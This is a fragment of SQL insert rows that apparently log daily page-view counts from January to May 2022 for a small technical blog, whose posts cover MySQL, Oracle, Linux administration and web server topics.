(2196,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-01-22',2,583),
(2197,'/about-me/','page','2022-01-22',1,51),
(2198,'/database-startup-error-fatal-ni-connect-error-12547/','post','2022-01-22',1,60),
(2199,'/connection-encryption-in-oracle-database/','post','2022-01-22',2,110),
(2200,'/','home','2022-01-23',29,365),
(2201,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-01-23',1,583),
(2202,'/about-me/','page','2022-01-23',1,51),
(2203,'/','home','2022-01-24',51,365),
(2204,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-01-24',5,583),
(2205,'/','home','2022-01-25',31,365),
(2206,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-01-25',4,583),
(2207,'/','home','2022-01-26',35,365),
(2208,'/about-me/','page','2022-01-26',1,51),
(2209,'/fedora-33-problem-with-broadcom-wifi-device/','post','2022-01-26',1,312),
(2210,'/','home','2022-01-27',25,365),
(2211,'/about-me/','page','2022-01-27',3,51),
(2212,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-01-27',4,583),
(2213,'/','home','2022-01-28',34,365),
(2214,'/about-me/','page','2022-01-28',2,51),
(2215,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-01-28',1,583),
(2216,'/','home','2022-01-29',45,365),
(2217,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-01-29',2,583),
(2218,'/about-me/','page','2022-01-29',1,51),
(2219,'/connection-encryption-in-oracle-database/','post','2022-01-30',2,110),
(2220,'/','home','2022-01-30',34,365),
(2221,'/about-me/','page','2022-01-30',1,51),
(2222,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-01-30',1,583),
(2223,'/','home','2022-01-31',22,365),
(2224,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-01-31',1,583),
(2225,'/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2022-01-31',1,150),
(2226,'/about-me/','page','2022-01-31',1,51),
(2227,'/','home','2022-02-01',37,365),
(2229,'/about-me/','page','2022-02-01',1,51),
(2230,'/connection-encryption-in-oracle-database/','post','2022-02-01',2,110),
(2231,'/','home','2022-02-02',24,365),
(2232,'/','home','2022-02-03',33,365),
(2233,'/about-me/','page','2022-02-03',1,51),
(2234,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-02-03',2,583),
(2235,'/sudo-without-password/','post','2022-02-03',1,603),
(2236,'/connection-encryption-in-oracle-database/','post','2022-02-03',1,110),
(2237,'/','home','2022-02-04',24,365),
(2238,'/','home','2022-02-05',35,365),
(2239,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-02-05',3,583),
(2240,'/','home','2022-02-06',37,365),
(2241,'/impdp-errors-ora-02374-ora-12899','post','2022-02-06',2,56),
(2242,'/','home','2022-02-07',33,365),
(2243,'/about-me/','page','2022-02-07',2,51),
(2244,'/','home','2022-02-08',24,365),
(2245,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-02-08',1,583),
(2246,'/about-me/','page','2022-02-08',1,51),
(2247,'/','home','2022-02-09',31,365),
(2248,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-02-09',4,583),
(2249,'/connection-encryption-in-oracle-database/','post','2022-02-09',2,110),
(2250,'/','home','2022-02-10',49,365),
(2251,'/about-me/','page','2022-02-10',1,51),
(2252,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-02-10',1,583),
(2253,'/','home','2022-02-11',36,365),
(2254,'/about-me/','page','2022-02-11',1,51),
(2255,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-02-11',4,583),
(2256,'/','home','2022-02-12',36,365),
(2257,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-02-12',2,583),
(2258,'/','home','2022-02-13',32,365),
(2259,'/','home','2022-02-14',28,365),
(2260,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-02-14',1,583),
(2261,'/about-me/','page','2022-02-14',1,51),
(2262,'/connection-encryption-in-oracle-database/','post','2022-02-14',1,110),
(2263,'/','home','2022-02-15',42,365),
(2264,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-02-15',2,583),
(2265,'/about-me/','page','2022-02-15',6,51),
(2266,'/','home','2022-02-16',57,365),
(2267,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-02-16',8,583),
(2268,'/','home','2022-02-17',37,365),
(2269,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-02-17',2,583),
(2270,'/impdp-errors-ora-02374-ora-12899/','post','2022-02-17',2,56),
(2271,'/about-me/','page','2022-02-17',1,51),
(2272,'/','home','2022-02-18',27,365),
(2273,'/impdp-errors-ora-02374-ora-12899/','post','2022-02-18',1,56),
(2274,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-02-18',16,583),
(2275,'/about-me/','page','2022-02-18',2,51),
(2276,'/sudo-without-password/','post','2022-02-18',1,603),
(2277,'/hosting-a-podcast/','post','2022-02-18',1,329),
(2278,'/fedora-33-problem-with-broadcom-wifi-device/','post','2022-02-18',2,312),
(2279,'/change-the-character-set-collation-of-a-table/','post','2022-02-18',1,68),
(2280,'/how-to-make-apache-web-server-more-secure/','post','2022-02-18',1,305),
(2281,'/add-new-disk-to-redhat-based-linux-without-reboot/','post','2022-02-18',1,97),
(2282,'/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2022-02-18',1,150),
(2283,'/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2022-02-18',1,104),
(2284,'/connection-encryption-in-oracle-database/','post','2022-02-18',1,110),
(2285,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-02-19',1,583),
(2286,'/','home','2022-02-19',15,365),
(2287,'/','home','2022-02-20',26,365),
(2288,'/about-me/','page','2022-02-20',1,51),
(2289,'/grid-infrastructure-oracle-database-12c-preinstallation-tasks/','post','2022-02-20',1,27),
(2290,'/','home','2022-02-21',23,365),
(2291,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-02-21',2,583),
(2292,'/about-me/','page','2022-02-21',1,51),
(2294,'/','home','2022-02-22',36,365),
(2295,'/connection-encryption-in-oracle-database/','post','2022-02-22',3,110),
(2296,'/about-me/','page','2022-02-22',1,51),
(2297,'/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2022-02-22',1,150),
(2298,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-02-22',2,583),
(2299,'/','home','2022-02-23',36,365),
(2300,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-02-23',3,583),
(2301,'/about-me/','page','2022-02-23',3,51),
(2302,'/','home','2022-02-24',34,365),
(2303,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-02-24',3,583),
(2304,'/connection-encryption-in-oracle-database/','post','2022-02-24',1,110),
(2305,'/','home','2022-02-25',25,365),
(2306,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-02-25',7,583),
(2307,'/','home','2022-02-26',28,365),
(2308,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-02-26',2,583),
(2309,'/','home','2022-02-27',18,365),
(2310,'/','home','2022-02-28',54,365),
(2311,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-02-28',2,583),
(2312,'/about-me/','page','2022-02-28',2,51),
(2313,'/','home','2022-03-01',17,365),
(2314,'/connection-encryption-in-oracle-database/','post','2022-03-01',5,110),
(2315,'/about-me/','page','2022-03-01',1,51),
(2316,'/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2022-03-01',2,104),
(2317,'/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2022-03-01',1,150),
(2318,'/connection-encryption-in-oracle-database/feed/','feed','2022-03-01',1,110),
(2319,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-03-01',4,583),
(2320,'/backup-restore-progress/','post','2022-03-01',1,64),
(2321,'/impdp-errors-ora-02374-ora-12899/','post','2022-03-01',1,56),
(2322,'/','home','2022-03-02',33,365),
(2323,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-03-02',1,583),
(2324,'/','home','2022-03-03',37,365),
(2325,'/impdp-errors-ora-02374-ora-12899/','post','2022-03-03',1,56),
(2326,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-03-03',2,583),
(2327,'/sudo-without-password/','post','2022-03-03',1,603),
(2328,'/','home','2022-03-04',51,365),
(2329,'/impdp-errors-ora-02374-ora-12899/','post','2022-03-04',2,56),
(2330,'/about-me/','page','2022-03-04',1,51),
(2331,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-03-04',1,583),
(2332,'/','home','2022-03-05',25,365),
(2333,'/impdp-errors-ora-02374-ora-12899','post','2022-03-05',2,56),
(2334,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-03-05',5,583),
(2335,'/hosting-a-podcast\\'','post','2022-03-05',4,329),
(2336,'/','home','2022-03-06',28,365),
(2337,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-03-06',2,583),
(2338,'/about-me/','page','2022-03-06',6,51),
(2339,'/','home','2022-03-07',36,365),
(2340,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-03-07',3,583),
(2341,'/about-me/','page','2022-03-07',2,51),
(2342,'/connection-encryption-in-oracle-database/','post','2022-03-07',5,110),
(2343,'/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2022-03-07',1,104),
(2344,'/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2022-03-07',1,150),
(2345,'/connection-encryption-in-oracle-database/feed/','feed','2022-03-07',1,110),
(2346,'/','home','2022-03-08',36,365),
(2347,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-03-08',3,583),
(2348,'/','home','2022-03-09',28,365),
(2349,'/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2022-03-09',1,104),
(2350,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-03-09',1,583),
(2351,'/','home','2022-03-10',28,365),
(2352,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-03-10',1,583),
(2353,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-03-11',2,583),
(2354,'/','home','2022-03-11',24,365),
(2355,'/about-me/','page','2022-03-11',1,51),
(2356,'/database-startup-error-fatal-ni-connect-error-12547/','post','2022-03-11',1,60),
(2357,'/connection-encryption-in-oracle-database/','post','2022-03-11',1,110),
(2358,'/','home','2022-03-12',40,365),
(2359,'/about-me/','page','2022-03-12',1,51),
(2360,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-03-12',2,583),
(2361,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-03-13',4,583),
(2362,'/','home','2022-03-13',31,365),
(2363,'/about-me/','page','2022-03-13',2,51),
(2364,'/','home','2022-03-14',42,365),
(2365,'/about-me/','page','2022-03-14',2,51),
(2366,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-03-14',6,583),
(2367,'/','home','2022-03-15',27,365),
(2368,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-03-15',2,583),
(2369,'/impdp-errors-ora-02374-ora-12899/','post','2022-03-15',1,56),
(2370,'/backup-restore-progress/','post','2022-03-16',1,64),
(2371,'/','home','2022-03-16',27,365),
(2372,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-03-16',1,583),
(2373,'/about-me/','page','2022-03-16',2,51),
(2374,'/','home','2022-03-17',43,365),
(2375,'/about-me/','page','2022-03-17',4,51),
(2376,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-03-17',2,583),
(2377,'/impdp-errors-ora-02374-ora-12899/','post','2022-03-17',1,56),
(2378,'/','home','2022-03-18',42,365),
(2379,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-03-18',1,583),
(2380,'/connection-encryption-in-oracle-database/','post','2022-03-18',1,110),
(2381,'/','home','2022-03-19',33,365),
(2382,'/about-me/','page','2022-03-19',1,51),
(2383,'/connection-encryption-in-oracle-database/','post','2022-03-19',6,110),
(2384,'/about-me/','page','2022-03-20',2,51),
(2385,'/','home','2022-03-20',41,365),
(2386,'/connection-encryption-in-oracle-database/','post','2022-03-20',2,110),
(2387,'/fedora-33-problem-with-broadcom-wifi-device/','post','2022-03-20',2,312),
(2388,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-03-20',1,583),
(2389,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-03-21',2,583),
(2390,'/','home','2022-03-21',67,365),
(2391,'/about-me/?mdrv=ictbank.ir','page','2022-03-21',2,51),
(2392,'/ictbank.ir?mdrv=ictbank.ir','post','2022-03-21',2,76),
(2393,'/connection-encryption-in-oracle-database/','post','2022-03-22',1,110),
(2394,'/','home','2022-03-22',38,365),
(2395,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-03-22',1,583),
(2396,'/impdp-errors-ora-02374-ora-12899/','post','2022-03-22',2,56),
(2397,'/connection-encryption-in-oracle-database/','post','2022-03-23',2,110),
(2398,'/','home','2022-03-23',23,365),
(2399,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-03-23',4,583),
(2400,'/impdp-errors-ora-02374-ora-12899/','post','2022-03-23',2,56),
(2401,'/','home','2022-03-24',33,365),
(2402,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-03-24',3,583),
(2404,'/connection-encryption-in-oracle-database/','post','2022-03-24',1,110),
(2405,'/about-me/','page','2022-03-24',1,51),
(2406,'/','home','2022-03-25',39,365),
(2407,'/about-me/','page','2022-03-25',3,51),
(2408,'/connection-encryption-in-oracle-database/','post','2022-03-25',10,110),
(2410,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-03-25',2,583),
(2411,'/fedora-33-problem-with-broadcom-wifi-device/','post','2022-03-25',1,312),
(2412,'/add-new-disk-to-redhat-based-linux-without-reboot/','post','2022-03-25',1,97),
(2413,'/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2022-03-25',1,104),
(2414,'/how-to-make-apache-web-server-more-secure/','post','2022-03-25',1,305),
(2415,'/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2022-03-25',1,150),
(2416,'/backup-restore-progress/','post','2022-03-25',1,64),
(2417,'/sudo-without-password/','post','2022-03-25',1,603),
(2418,'/database-startup-error-fatal-ni-connect-error-12547/','post','2022-03-25',1,60),
(2419,'/change-the-character-set-collation-of-a-table/','post','2022-03-25',1,68),
(2420,'/impdp-errors-ora-02374-ora-12899/','post','2022-03-25',1,56),
(2421,'/','home','2022-03-26',23,365),
(2422,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-03-26',2,583),
(2423,'/about-me/','page','2022-03-26',1,51),
(2424,'/','home','2022-03-27',27,365),
(2425,'/about-me/','page','2022-03-27',6,51),
(2426,'/','home','2022-03-28',34,365),
(2427,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-03-28',4,583),
(2428,'/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2022-03-28',2,104),
(2429,'/about-me/','page','2022-03-28',4,51),
(2430,'/fedora-33-problem-with-broadcom-wifi-device/','post','2022-03-28',1,312),
(2431,'/add-new-disk-to-redhat-based-linux-without-reboot/','post','2022-03-28',1,97),
(2432,'/how-to-make-apache-web-server-more-secure/','post','2022-03-28',1,305),
(2433,'/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2022-03-28',1,150),
(2434,'/backup-restore-progress/','post','2022-03-28',1,64),
(2435,'/connection-encryption-in-oracle-database/','post','2022-03-28',4,110),
(2436,'/sudo-without-password/','post','2022-03-28',1,603),
(2437,'/database-startup-error-fatal-ni-connect-error-12547/','post','2022-03-28',1,60),
(2438,'/change-the-character-set-collation-of-a-table/','post','2022-03-28',1,68),
(2439,'/impdp-errors-ora-02374-ora-12899/','post','2022-03-28',1,56),
(2440,'/','home','2022-03-29',37,365),
(2441,'/about-me/','page','2022-03-29',1,51),
(2442,'/add-new-disk-to-redhat-based-linux-without-reboot/','post','2022-03-29',1,97),
(2443,'/connection-encryption-in-oracle-database/','post','2022-03-29',1,110),
(2444,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-03-29',1,583),
(2445,'/','home','2022-03-30',24,365),
(2446,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-03-30',1,583),
(2447,'/fedora-33-problem-with-broadcom-wifi-device/','post','2022-03-30',1,312),
(2448,'/about-me/','page','2022-03-30',1,51),
(2449,'/','home','2022-03-31',33,365),
(2450,'/','home','2022-04-01',46,365),
(2451,'/about-me/','page','2022-04-01',1,51),
(2452,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-04-01',2,583),
(2453,'/','home','2022-04-02',37,365),
(2454,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-04-02',6,583),
(2455,'/how-to-make-apache-web-server-more-secure/','post','2022-04-02',1,305),
(2456,'/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2022-04-02',1,150),
(2457,'/impdp-errors-ora-02374-ora-12899','post','2022-04-02',2,56),
(2458,'/connection-encryption-in-oracle-database/','post','2022-04-02',9,110),
(2459,'/','home','2022-04-03',29,365),
(2460,'/about-me/','page','2022-04-03',1,51),
(2461,'/sudo-without-password/','post','2022-04-03',1,603),
(2462,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-04-03',2,583),
(2463,'/hosting-a-podcast/','post','2022-04-03',1,329),
(2464,'/fedora-33-problem-with-broadcom-wifi-device/','post','2022-04-03',1,312),
(2465,'/change-the-character-set-collation-of-a-table/','post','2022-04-03',1,68),
(2466,'/how-to-make-apache-web-server-more-secure/','post','2022-04-03',1,305),
(2467,'/add-new-disk-to-redhat-based-linux-without-reboot/','post','2022-04-03',1,97),
(2468,'/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2022-04-03',1,150),
(2469,'/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2022-04-03',1,104),
(2470,'/connection-encryption-in-oracle-database/','post','2022-04-03',1,110),
(2471,'/backup-restore-progress//','post','2022-04-03',1,64),
(2472,'/','home','2022-04-04',34,365),
(2473,'/about-me/','page','2022-04-04',1,51),
(2474,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-04-04',9,583),
(2475,'/','home','2022-04-05',28,365),
(2476,'/connection-encryption-in-oracle-database/','post','2022-04-05',1,110),
(2477,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-04-05',1,583),
(2478,'/','home','2022-04-06',42,365),
(2479,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/?msclkid=b6727298b56b11ecb44bcf6cb03c67d6','post','2022-04-06',2,583),
(2480,'/about-me/','page','2022-04-06',1,51),
(2481,'/','home','2022-04-07',41,365),
(2482,'/about-me/','page','2022-04-07',1,51),
(2483,'/connection-encryption-in-oracle-database/','post','2022-04-07',6,110),
(2484,'/','home','2022-04-08',40,365),
(2485,'/connection-encryption-in-oracle-database/','post','2022-04-08',5,110),
(2486,'/','home','2022-04-09',25,365),
(2487,'/about-me/','page','2022-04-09',2,51),
(2488,'/','home','2022-04-10',19,365),
(2489,'/grid-infrastructure-oracle-database-12c-preinstallation-tasks/','post','2022-04-10',1,27),
(2490,'/about-me','page','2022-04-10',3,51),
(2491,'/','home','2022-04-11',33,365),
(2492,'/about-me/','page','2022-04-11',2,51),
(2493,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-04-11',1,583),
(2494,'/connection-encryption-in-oracle-database/','post','2022-04-11',1,110),
(2495,'/','home','2022-04-12',33,365),
(2496,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-04-12',1,583),
(2497,'/about-me/','page','2022-04-12',1,51),
(2498,'/','home','2022-04-13',46,365),
(2499,'/connection-encryption-in-oracle-database/','post','2022-04-13',6,110),
(2500,'/impdp-errors-ora-02374-ora-12899/','post','2022-04-13',1,56),
(2501,'/about-me/','page','2022-04-13',2,51),
(2502,'/','home','2022-04-14',46,365),
(2503,'/about-me/','page','2022-04-14',2,51),
(2504,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-04-14',6,583),
(2505,'/impdp-errors-ora-02374-ora-12899','post','2022-04-14',6,56),
(2506,'/impdp-errors-ora-02374-ora-12899/','post','2022-04-14',6,56),
(2507,'/','home','2022-04-15',67,365),
(2508,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-04-15',2,583),
(2509,'/about-me/','page','2022-04-15',2,51),
(2510,'/impdp-errors-ora-02374-ora-12899/','post','2022-04-16',1,56),
(2511,'/','home','2022-04-16',48,365),
(2512,'/connection-encryption-in-oracle-database/','post','2022-04-16',2,110),
(2513,'/about-me/','page','2022-04-16',1,51),
(2514,'/','home','2022-04-17',30,365),
(2515,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-04-17',2,583),
(2516,'/about-me/','page','2022-04-17',1,51),
(2517,'/','home','2022-04-18',58,365),
(2518,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-04-18',2,583),
(2519,'/about-me/','page','2022-04-18',5,51),
(2520,'/about-me/','page','2022-04-19',2,51),
(2521,'/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2022-04-19',1,104),
(2522,'/impdp-errors-ora-02374-ora-12899/','post','2022-04-19',2,56),
(2523,'/add-new-disk-to-redhat-based-linux-without-reboot/','post','2022-04-19',1,97),
(2524,'/','home','2022-04-19',35,365),
(2525,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-04-19',1,583),
(2526,'/','home','2022-04-20',46,365),
(2527,'/about-me/','page','2022-04-20',1,51),
(2528,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-04-20',3,583),
(2529,'/impdp-errors-ora-02374-ora-12899/','post','2022-04-20',4,56),
(2530,'/connection-encryption-in-oracle-database/','post','2022-04-20',10,110),
(2531,'/','home','2022-04-21',66,365),
(2532,'/connection-encryption-in-oracle-database/','post','2022-04-21',2,110),
(2533,'/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2022-04-21',1,104),
(2534,'/','home','2022-04-22',56,365),
(2535,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-04-22',4,583),
(2536,'/impdp-errors-ora-02374-ora-12899/','post','2022-04-22',1,56),
(2537,'/','home','2022-04-23',41,365),
(2538,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-04-23',1,583),
(2539,'/','home','2022-04-24',33,365),
(2540,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-04-24',3,583),
(2541,'/','home','2022-04-25',28,365),
(2542,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-04-25',4,583),
(2543,'/connection-encryption-in-oracle-database/','post','2022-04-25',8,110),
(2544,'/','home','2022-04-26',43,365),
(2545,'/about-me/','page','2022-04-26',1,51),
(2546,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-04-26',2,583),
(2547,'/connection-encryption-in-oracle-database/','post','2022-04-26',3,110),
(2548,'/','home','2022-04-27',27,365),
(2549,'/about-me/','page','2022-04-27',2,51),
(2550,'/impdp-errors-ora-02374-ora-12899/','post','2022-04-27',1,56),
(2551,'/','home','2022-04-28',39,365),
(2552,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-04-28',13,583),
(2553,'/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2022-04-28',8,104),
(2554,'/about-me/','page','2022-04-28',1,51),
(2555,'/','home','2022-04-29',33,365),
(2556,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-04-29',1,583),
(2557,'/','home','2022-04-30',88,365),
(2558,'/about-me/','page','2022-04-30',7,51),
(2559,'/impdp-errors-ora-02374-ora-12899/','post','2022-04-30',1,56),
(2560,'/','home','2022-05-01',23,365),
(2561,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-05-01',7,583),
(2562,'/impdp-errors-ora-02374-ora-12899','post','2022-05-01',2,56),
(2563,'/connection-encryption-in-oracle-database/','post','2022-05-01',2,110),
(2564,'/sudo-without-password/','post','2022-05-01',1,603),
(2565,'/','home','2022-05-02',34,365),
(2566,'/impdp-errors-ora-02374-ora-12899/','post','2022-05-02',1,56),
(2567,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-05-02',2,583),
(2568,'/','home','2022-05-03',29,365),
(2569,'/about-me/','page','2022-05-03',1,51),
(2570,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-05-03',3,583),
(2571,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-05-04',4,583),
(2572,'/','home','2022-05-04',46,365),
(2573,'/about-me/','page','2022-05-04',1,51),
(2574,'/impdp-errors-ora-02374-ora-12899/','post','2022-05-04',2,56),
(2575,'/','home','2022-05-05',43,365),
(2576,'/about-me/','page','2022-05-05',1,51),
(2577,'/sudo-without-password/','post','2022-05-05',1,603),
(2578,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-05-05',3,583),
(2579,'/how-to-make-apache-web-server-more-secure/','post','2022-05-05',1,305),
(2580,'/connection-encryption-in-oracle-database/','post','2022-05-05',1,110),
(2581,'/add-new-disk-to-redhat-based-linux-without-reboot/','post','2022-05-05',1,97),
(2582,'/change-the-character-set-collation-of-a-table/','post','2022-05-05',1,68),
(2583,'/backup-restore-progress/','post','2022-05-05',1,64),
(2584,'/database-startup-error-fatal-ni-connect-error-12547/','post','2022-05-05',1,60),
(2585,'/impdp-errors-ora-02374-ora-12899/','post','2022-05-05',2,56),
(2586,'/fedora-33-problem-with-broadcom-wifi-device/','post','2022-05-05',1,312),
(2587,'/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2022-05-05',1,104),
(2588,'/','home','2022-05-06',25,365),
(2589,'/about-me/','page','2022-05-06',2,51),
(2590,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-05-06',5,583),
(2591,'/impdp-errors-ora-02374-ora-12899/','post','2022-05-06',1,56),
(2592,'/connection-encryption-in-oracle-database/','post','2022-05-06',10,110),
(2593,'/','home','2022-05-07',36,365),
(2594,'/about-me/','page','2022-05-07',2,51),
(2595,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-05-07',2,583),
(2596,'/','home','2022-05-08',40,365),
(2597,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-05-08',2,583),
(2598,'/about-me/','page','2022-05-08',1,51),
(2599,'/','home','2022-05-09',28,365),
(2600,'/connection-encryption-in-oracle-database/','post','2022-05-09',1,110),
(2601,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-05-09',2,583),
